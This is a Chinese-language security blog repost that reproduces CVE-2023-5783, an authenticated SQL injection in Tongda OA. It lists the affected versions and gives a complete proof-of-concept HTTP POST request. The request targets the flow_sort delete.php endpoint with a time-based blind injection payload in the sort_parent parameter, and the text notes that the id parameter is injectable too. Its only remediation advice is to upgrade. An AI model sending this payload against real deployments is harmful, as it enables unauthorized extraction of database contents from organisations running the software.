【漏洞复现】通达OA SQL注入漏洞（CVE-2023-5783）

admin

140327
文章

117
评论

2023年11月27日08:07:22评论106 views字数 1001阅读3分20秒阅读模式

声明：请勿将文章内的相关技术用于非法目的，如有相关非法行为与文章作者和本公众号无关。请遵守《中华人民共和国网络安全法》。

0X01 简介

通达OA（Office Anywhere网络智能办公系统）是由北京通达信科科技有限公司自主研发的协同办公自动化软件，是与中国企业管理实践相结合形成的综合管理办公平台。

官网：

https://www.tongda2000.com/

漏洞编号：

CVE-2023-5783

影响范围：

通达OA >= 2017版

通达OA < 11.10

复现环境：

通达OA 2017版

0X02 漏洞复现

漏洞利用需登录。

POC：

POST /general/system/approve_center/flow_sort/flow/delete.php HTTP/1.1Host: 192.168.245.134Cookie: USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=bf11e55b; _csrf=fb9605328bee63ab5b949c268b858d698cf75170a848c7b0882a2b8a14d66f71a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22dJ8hKTNoKf_MTAQdu5ag7otcWNXsBgUm%22%3B%7D; creat_work=new; SID_66=1ca61957; PHPSESSID=ba68o12ogg8co6hg47dbvc77i4Upgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 160

id=1&sort_parent=1%20and%20(substr(DATABASE(),1,1))=char(116)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)

id与sort_parent两个参数不能为空，两个参数都可以注入右下角看延时

0X03 修复建议

更新至最新版！

原文始发于微信公众号（皓月的笔记本）：【漏洞复现】通达OA SQL注入漏洞（CVE-2023-5783）

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

【漏洞复现】通达OA SQL注入漏洞（CVE-2023-5783）

漏洞复现 || XWiki Platform系统远程代码执行 POC

用友NC files 反序列化RCE

【高危漏洞预警】Elastic Kibana需授权代码注入漏洞 (CVE-2025-25014)

CVE-2025-2905（CVSS 9.1）：WSO2 API 管理器中发现严重 XXE 漏洞

【风险通告】Elastic Kibana存在原型污染致任意代码执行漏洞（CVE-2025-25014）

Kibana 原型污染导致执行任意代码漏洞（CVE-2025-25014）

CVE-2025-24071：通过 RAR/ZIP 提取和 .library-ms 文件泄露 NTLM 哈希值

Kibana 原型污染导致执行任意代码漏洞（CVE-2025-25014）

WordPress depicter插件SQL注入漏洞（CVE-2025-2011）

Kibana 原型污染导致任意代码执行漏洞 (CVE-2025-25014)

发表评论

在线咨询

微信